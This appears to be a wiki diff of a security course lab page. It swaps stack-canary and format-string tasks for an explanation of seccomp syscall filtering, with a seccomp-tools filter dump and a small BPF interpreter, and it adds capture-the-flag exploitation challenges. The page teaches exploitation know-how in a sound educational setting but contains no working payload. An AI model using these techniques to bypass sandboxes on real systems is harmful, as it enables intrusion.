- | === Stack Canaries | + | ==== seccomp ==== |
- | Download | + | **seccomp** is a mechanism through which an application may transition into a state where the system calls it performs are restricted. The policy, which may act on a whitelist or blacklist model, is described using [[https:// |
- | ==== Task 1 | + | seccomp filters are instated using the '' |
- | The '' | + | This may severely limit our exploitation prospects in some cases. In the challenges that we have solved during these sessions, a common goal was spawning a shell and retrieving a certain file (the flag). If the exploited binary used a seccomp filter that disallowed the '' |
- | ==== Task 2 | + | The [[https:// |
+ | <code bash> | ||
+ | silvia@imladris:/ | ||
+ | | ||
+ | ================================= | ||
+ | 0000: 0x20 0x00 0x00 0x00000004 | ||
+ | 0001: 0x15 0x00 0x09 0x40000003 | ||
+ | 0002: 0x20 0x00 0x00 0x00000000 | ||
+ | 0003: 0x15 0x07 0x00 0x000000ad | ||
+ | 0004: 0x15 0x06 0x00 0x00000077 | ||
+ | 0005: 0x15 0x05 0x00 0x000000fc | ||
+ | 0006: 0x15 0x04 0x00 0x00000001 | ||
+ | 0007: 0x15 0x03 0x00 0x00000005 | ||
+ | 0008: 0x15 0x02 0x00 0x00000003 | ||
+ | 0009: 0x15 0x01 0x00 0x00000004 | ||
+ | 0010: 0x06 0x00 0x00 0x00050026 | ||
+ | 0011: 0x06 0x00 0x00 0x7fff0000 | ||
+ | </ | ||
- | The '' | + | In the example above we see a filter operating on the whitelist model: it specifies a subset of syscalls that are allowed: |
- | < | + | < |
- | You need to use the 32 bit VM to solve the second part of this task. | + | To install seccomp-tools on the Kali VM, use the gem package manager: |
+ | < | ||
+ | $ gem install seccomp-tools | ||
+ | </ | ||
</ | </ | ||
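To see how the raw columns of the dump above encode a whitelist, the filter can be interpreted by hand. The sketch below is a toy interpreter, not the kernel's implementation: it supports only the three opcodes this filter uses, the tuples are copied from the ''CODE JT JF K'' columns above, and the syscall numbers in the usage loop are the i386 ones. The function name ''run_filter'' is hypothetical.

```python
# (code, jt, jf, k) tuples copied from the raw columns of the dump above.
FILTER = [
    (0x20, 0x00, 0x00, 0x00000004),
    (0x15, 0x00, 0x09, 0x40000003),
    (0x20, 0x00, 0x00, 0x00000000),
    (0x15, 0x07, 0x00, 0x000000AD),
    (0x15, 0x06, 0x00, 0x00000077),
    (0x15, 0x05, 0x00, 0x000000FC),
    (0x15, 0x04, 0x00, 0x00000001),
    (0x15, 0x03, 0x00, 0x00000005),
    (0x15, 0x02, 0x00, 0x00000003),
    (0x15, 0x01, 0x00, 0x00000004),
    (0x06, 0x00, 0x00, 0x00050026),
    (0x06, 0x00, 0x00, 0x7FFF0000),
]

LD_W_ABS, JEQ_K, RET_K = 0x20, 0x15, 0x06  # load word, jump-if-equal, return
AUDIT_ARCH_I386 = 0x40000003
SECCOMP_RET_ALLOW = 0x7FFF0000


def run_filter(nr, arch=AUDIT_ARCH_I386):
    """Interpret FILTER for one syscall and return the 32-bit seccomp action."""
    data = {0: nr, 4: arch}  # seccomp_data: syscall number at offset 0, arch at offset 4
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = FILTER[pc]
        pc += 1
        if code == LD_W_ABS:
            acc = data[k]
        elif code == JEQ_K:
            pc += jt if acc == k else jf  # jump offsets are relative to the next instruction
        elif code == RET_K:
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x}")


for name, nr in [("read", 3), ("open", 5), ("execve", 11)]:
    action = run_filter(nr)
    print(f"{name:7s} -> {action:#010x}", "ALLOW" if action == SECCOMP_RET_ALLOW else "denied")
```

Every ''0x15'' comparison that matches jumps to the final ''ALLOW'' return, and anything that falls through reaches the instruction before it, which returns an error action instead. That fall-through default is what makes this a whitelist.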
- | <note warning> | + | ===== Challenges ===== |
- | '' | + | |
- | </ | + | |
- | <note tip>In case you need some help on these, please take a look at the {{: | + | ==== 01-04. Challenges - rwslotmachine[1-4] ==== |
+ | All of the challenges in this section are intended to be solved with **ASLR enabled**. However, you are free to disable it while developing your exploit for debugging purposes. You are provided with the needed shared libraries from the remote system. | ||
+ | |||
+ | The challenges are based on the same //" | ||
+ | |||
+ | They are numbered in the suggested solving order. | ||
- | === Task 3 - Format Strings | ||
- | Download the archive with the tasks at the top of the page containing 5 binaries exhibiting a format string vulnerability. Analyze what each binary does using the methods already familiar to you and try to determine the exact format string that will lead to the desired result. | ||
<note important> | <note important> | ||
- | The difficulty of the task associated with each binary increases with the number | + | In the case of '' |
</ | </ | ||
- | < | + | |
- | shows you the invalid address associated with a SIGSEGV signal. | + | < |
+ | To set LD_LIBRARY_PATH from a pwntools script, use this method: | ||
+ | <code python> | ||
+ | p = process(' | ||
+ | </ | ||
</ | </ | ||
+ | |||
<note tip> | <note tip> | ||
- | In case you get stuck, please have a look at the {{: | + | //Hint//: Do not waste time on reverse engineering '' |
</ | </ | ||
- | == References | ||
- | * [[http:// | ||
- | === Feedback | ||
- | Your feedback is very much needed and appreciated [[https:// | ||
+ | ==== 05. Bonus - rwslotmachine5 ==== | ||
+ | |||
+ | This challenge is similar to '' | ||
+ | |||
+ | <note tip> | ||
+ | You can find a table describing x86 syscalls [[http:// | ||
+ | </ |